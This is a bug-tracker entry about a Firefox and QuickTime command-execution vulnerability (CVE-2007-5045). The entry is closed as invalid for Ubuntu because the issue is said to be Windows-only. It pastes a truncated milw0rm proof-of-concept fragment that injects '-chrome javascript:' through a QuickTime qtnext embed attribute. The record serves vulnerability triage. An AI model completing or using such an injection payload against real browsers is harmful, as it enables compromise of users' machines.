Mozilla Firefox + QuickTime Command Execution
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
firefox (Ubuntu) |
Invalid
|
Undecided
|
Kees Cook |
Bug Description
Mozilla Firefox, Swiftfox, and other mozilla browsers are effected
<!--
http://
It seams that QuickTime media formats can hack into Firefox.
The result of this vulnerability can lead to full compromise of
the browser and maybe even the underlaying operating system.
Don\u2019t try this at home.
-->
<?xml version="1.0">
<?quicktime type="applicati
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:
# milw0rm.com [2007-09-12]
This is CVE-2007-5045. It does not affect Ubuntu -- it is a Windows-only problem.